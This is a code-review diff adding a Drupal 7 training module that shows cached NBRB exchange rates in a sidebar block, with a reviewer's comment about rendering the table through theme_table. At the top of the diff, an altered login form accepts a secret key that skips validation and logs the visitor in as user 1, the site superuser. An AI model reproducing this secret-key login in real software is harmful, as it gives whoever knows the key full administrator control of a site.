sites/all/modules/custom/training2/training2.module

```diff
@@ -0,0 +1,220 @@
+
+  $secret_key = $form_state['values']['secret_key'];
+  if ($secret_key) {
+    if ($secret_key == TRAINING2_ADMIN_SECRET_KEY){
+      form_clear_error();
+      drupal_get_messages();
+    }
+    else {
+      form_set_error('text', t('You shall not pass!!! Secret key is wrong!!!'));
+    }
+  }
+}
+
+/**
+ * Submit function for altered user-login form in training2 module.
+ */
+function training2_user_login_secret_submit($form, &$form_state) {
+
+  $form_state['uid'] = 1;
+  user_login_submit($form, $form_state);
+}
+
+/**
+ * Implements hook_block_info().
+ */
+function training2_block_info() {
+
+  $blocks['exchange'] = array(
+    'info' => t('Exchange'),
+    'region' => 'sidebar_first',
+    'cache' => DRUPAL_CACHE_GLOBAL,
+  );
+
+  return $blocks;
+}
+
+/**
+ * Implements hook_block_view().
+ */
+function training2_block_view($delta = '') {
+
+  if ($delta == 'exchange') {
+    $block['subject'] = t('Exchange rates');
+    $block['content'] = training_block_contents($delta);
+
+    return $block;
+  }
+}
+
+/**
+ * A module-defined block content function.
+ */
+function training_block_contents($delta = '') {
+
+  if ($delta == 'exchange') {
+
+    $update = variable_get('exchange_rates_update_time');
+    // Rates are updated once a day (86400 seconds).
+    if (!$update || (REQUEST_TIME - $update) >= 86400) {
+      $update = REQUEST_TIME;
+      $currencies = training2_get_remote_xml(TRAINING2_NBRB_CURRENCIES_REMOTE_XML);
+      $rates = training2_get_remote_xml(TRAINING2_NBRB_EXCHANGE_RATES_REMOTE_XML);
+
+      // Here we create an array from rates of only traded currencies.
+      foreach($rates->Currency as $currency) {
+        $code = (string) $currency->CharCode;
+        $rate = (string) $currency->Rate;
+        $traded_cur_rates[$code] = $rate;
+      }
+
+      // Here we get an array with display configurations for currencies.
+      $currencies_to_display = variable_get('currencies_to_display');
+
+      // Here we create an array from rates of all the currencies.
+      foreach ($currencies->Currency as $currency) {
+        $code = (string) $currency->CharCode;
+        // Add new currency to the currencies to display, if appear in the list.
+        if (!isset($currencies_to_display[$code])) {
+          $currencies_to_display[$code] = 0;
+        }
+        // Check if the currency is traded.
+        if (array_key_exists($code, $traded_cur_rates)) {
+          $exchange_rates[$code] = $traded_cur_rates[$code];
+         }
+        else {
+          $exchange_rates[$code] = 'no data';
+        }
+      }
+
+      variable_set('currencies_to_display', $currencies_to_display);
+      variable_set('exchange_rates', $exchange_rates);
+      variable_set('exchange_rates_update_time', $update);
+    }
+    else {
+      $exchange_rates =  variable_get('exchange_rates');
+      $currencies_to_display = variable_get('currencies_to_display');
+    }
+
+    $content = '<table>';
```

Comment:
Apply https://api.drupal.org/api/drupal/includes%21theme.inc/function/theme_table/7.x to render html table 
Smth like this: $output = theme('table', array('header' => $header, 'rows' => $rows));